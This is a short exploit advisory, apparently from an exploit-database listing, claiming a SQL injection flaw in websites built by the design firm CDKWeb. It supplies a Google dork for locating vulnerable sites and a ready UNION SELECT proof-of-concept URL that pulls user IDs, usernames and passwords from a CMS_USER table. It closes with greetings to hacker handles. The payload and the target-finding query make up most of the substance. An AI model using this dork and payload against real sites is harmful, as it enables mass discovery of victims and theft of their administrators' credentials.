Sites designed by CDKWeb suffer from a remote SQL injection vulnerability.
18e6679a40b929c337a8620d40a8fc120dcaacca43578f814bb7f43e08244f16
==== Exploit Author:Th3 R0cksT3r ====
# Exploit Title: CDKWeb SQL injection
# Date: 06.02.2014
# Email: th3rockst3r@gmail.com
# Vendor Homepage: http://www.cdkweb.com/
# Facebook: Facebook.com/thee.rocksTer
# Google Dork: inurl:.php?id= intext:Website Design and Web Development by
CDKWeb
# Risk: High
=== Description* ===*
An attacker can get database info by this vulnerablity.
Proof Of Concept:
http://www.site.com/pressReleaseDetails.php?id=-136/%27+UNION+SELECT+1,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8+from+CMS_USER--+
===Solution===
Upgrade to latest version.
# Greetz:Back Bone,Demon,Orions Hunter,Dark Knight Sparda,Gh0st
KilL3r,Luge,Code Breaker,Darklord,Devil Prince,Rakhal Beduin,Bakeer
Bhai,R007 C0D3,Dipto,8l@ck 3xplor3r,
Sparrow,Bd Matrix,Cyber Blader,Batchfweak and BD BLACK HAT